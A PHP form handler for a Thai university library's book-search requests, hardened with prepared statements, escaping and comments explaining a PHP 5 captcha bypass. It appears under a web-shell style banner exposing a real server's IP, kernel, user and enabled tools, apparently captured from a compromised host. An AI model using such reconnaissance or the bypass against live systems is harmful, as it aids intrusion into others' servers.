Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/5800/root/var/www/html/sb2/pages/


Current File : /proc/5800/root/var/www/html/sb2/pages/searchbook_add_db.php
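<?php ob_start(); ?>
<?php session_start(); ?>
<?php include 'dbconnect.php'; ?>
<?php include 'header.php'; ?>
<?php
/*
 * Book-search request form handler.
 *
 * Checks the captcha, validates the requester fields and up to $num_books
 * book rows (tidN / aidN / cidN), then stores one request_list row plus one
 * request_item row per complete book.
 *
 * Every $_POST value is untrusted. Values reach MySQL only through bound
 * parameters and reach the page only through the HTML escaper below; building
 * SQL or HTML by concatenating request data is what this version removes.
 * $conn is expected to be the mysqli link created by dbconnect.php.
 */

// Read one POST field as a string. Array-valued fields (name[]=x) are treated
// as missing: on PHP 5 strcasecmp() returns NULL for an array argument and
// "NULL != 0" is false, which would let the captcha check pass unsolved.
$read_post = function ($key) {
	return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
};

// Escape a value for HTML text context.
// NOTE(review): assumes the page is served as UTF-8 - confirm in header.php.
$esc_html = function ($value) {
	return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

if (!empty($_POST["submit"]))
{
	$captcha_expected = (isset($_SESSION['captcha_code']) && is_scalar($_SESSION['captcha_code']))
		? (string) $_SESSION['captcha_code']
		: '';
	$captcha_given = $read_post('captcha_code');

	if (empty($captcha_expected) || strcasecmp($captcha_expected, $captcha_given) !== 0) {
		$msg = "<br><span style='color:red'>รหัสตรวจสอบไม่ถูกต้อง!</span>"; // Captcha verification is incorrect.
		echo "<p>" . $msg . "</p>";
?>
<a href="javascript:history.back(1);">คลิกที่นี่เพื่อกลับหน้าที่แล้ว</a>
<?php
	} else { // captcha accepted

		$num_books = 10;
		$prefix_id = $read_post("prefix_id");
		$firstname = $read_post("firstname");
		$lastname = $read_post("lastname");
		$user_type_code = $read_post("user_type_code");
		$faculty_id = $read_post("faculty_id");
		$program = $read_post("program");
		$phone = $read_post("phone");
		$email = $read_post("email");
		// NOTE(review): the form may also post "note" and "receive_method_id";
		// neither was ever stored (receive_method_id is written as the constant 1).
		// Confirm whether that is intended.

		$required_filled = ($prefix_id !== "") && ($firstname !== "") && ($lastname !== "")
			&& ($user_type_code !== "") && ($faculty_id !== "") && ($program !== "")
			&& ($phone !== "") && ($email !== "");
		// prefix_id and faculty_id were embedded unquoted in the SQL, so they are
		// presumably numeric keys; anything other than digits is rejected here.
		$ids_numeric = ctype_digit($prefix_id) && ctype_digit($faculty_id);

		if ($required_filled && $ids_numeric)
		{
			// Collect the complete book rows once. A partially filled row rejects
			// the whole submission, even when a later row is complete (previously
			// the last non-empty row decided and the partial row was dropped
			// without any message).
			$books = array();
			$has_partial_row = false;
			$message_book = "<BR>กรุณากรอกข้อมูลหนังสือที่ต้องการใช้บริการค้นหาตัวเล่ม";
			for ($i = 1; $i <= $num_books; $i++) {
				$tinput = $read_post("tid" . $i);
				$ainput = $read_post("aid" . $i);
				$cinput = $read_post("cid" . $i);
				if ($tinput === "" && $ainput === "" && $cinput === "") {
					continue; // unused row
				}
				if ($tinput !== "" && $ainput !== "" && $cinput !== "") {
					$books[] = array($tinput, $ainput, $cinput);
				} else {
					$has_partial_row = true;
					// The submitted values are echoed back, so they are escaped.
					$message_book = "<BR>กรุณากรอกรายละเอียดหนังสือให้ครบ<br>" . "ชื่อเรื่อง : " . $esc_html($tinput) . "<BR>" . "ชื่อผู้แต่ง : " . $esc_html($ainput) . "<BR>" . "เลขเรียกหนังสือ : " . $esc_html($cinput);
				}
			}
			$book_detail_ok = (count($books) > 0 && !$has_partial_row) ? 1 : 0;

			if ($book_detail_ok == 1) {
				$saved = false;

				// Find the next request_number.
				// NOTE(review): read-then-insert is not atomic; two concurrent
				// submissions can obtain the same number. An AUTO_INCREMENT column
				// or a unique key on request_number would close that gap.
				$new_request_number = 1;
				$sql = "SELECT request_number FROM request_list ORDER BY request_number DESC LIMIT 1";
				$query = mysqli_query($conn, $sql);
				if ($query) {
					if ($result = mysqli_fetch_array($query, MYSQLI_ASSOC)) {
						$new_request_number = $result["request_number"] + 1;
					}
					mysqli_free_result($query);

					// Save the request header into table request_list.
					$default_status_id = 0;
					$receive_method = 1;
					$sql = "INSERT INTO request_list "
						. "(request_number,prefix_id,firstname,lastname,user_type_code,faculty_id,program,phone,email,status_id,receive_method_id) "
						. "VALUES (?,?,?,?,?,?,?,?,?,?,?)";
					$stmt = mysqli_prepare($conn, $sql);
					if ($stmt) {
						// The two ids are digit-only strings; binding them as strings
						// lets MySQL range-check them instead of PHP truncating.
						mysqli_stmt_bind_param(
							$stmt,
							"issssssssii",
							$new_request_number,
							$prefix_id,
							$firstname,
							$lastname,
							$user_type_code,
							$faculty_id,
							$program,
							$phone,
							$email,
							$default_status_id,
							$receive_method
						);
						$saved = mysqli_stmt_execute($stmt);
						mysqli_stmt_close($stmt);
					}
				}

				if ($saved)
				{
					// Save each complete book into table request_item.
					$title = $author = $callnumber = '';
					$stmt2 = mysqli_prepare($conn, "INSERT INTO request_item (request_number,title,author,callnumber) VALUES (?,?,?,?)");
					if ($stmt2) {
						mysqli_stmt_bind_param($stmt2, "isss", $new_request_number, $title, $author, $callnumber);
					}
					foreach ($books as $book) {
						list($title, $author, $callnumber) = $book;
						$query2 = $stmt2 ? mysqli_stmt_execute($stmt2) : false;
						if (!$query2) {
							echo "ไม่สามารถบันทึกข้อมูลได้";
						}
					}
					if ($stmt2) {
						mysqli_stmt_close($stmt2);
					}

					// One solved captcha authorises one stored request.
					// NOTE(review): assumes the form page issues a fresh code on load.
					unset($_SESSION['captcha_code']);
?>
	<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="request_list.php"><button type="button" class="btn-success">คลิกที่นี่เพื่อดูรายการ</button></a>
<?php
				}
				else
				{
					echo "ไม่สามารถบันทึกข้อมูลได้";
				}
			} else { // book rows missing or incomplete
				echo $message_book;
?>
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
			}
		} else { // a required requester field is missing or an id is not numeric
?>
	<BR />กรุณากรอกข้อมูลให้ครบถ้วน
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
		}
	}
}
?>

<?php include 'footer.php'; ?>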
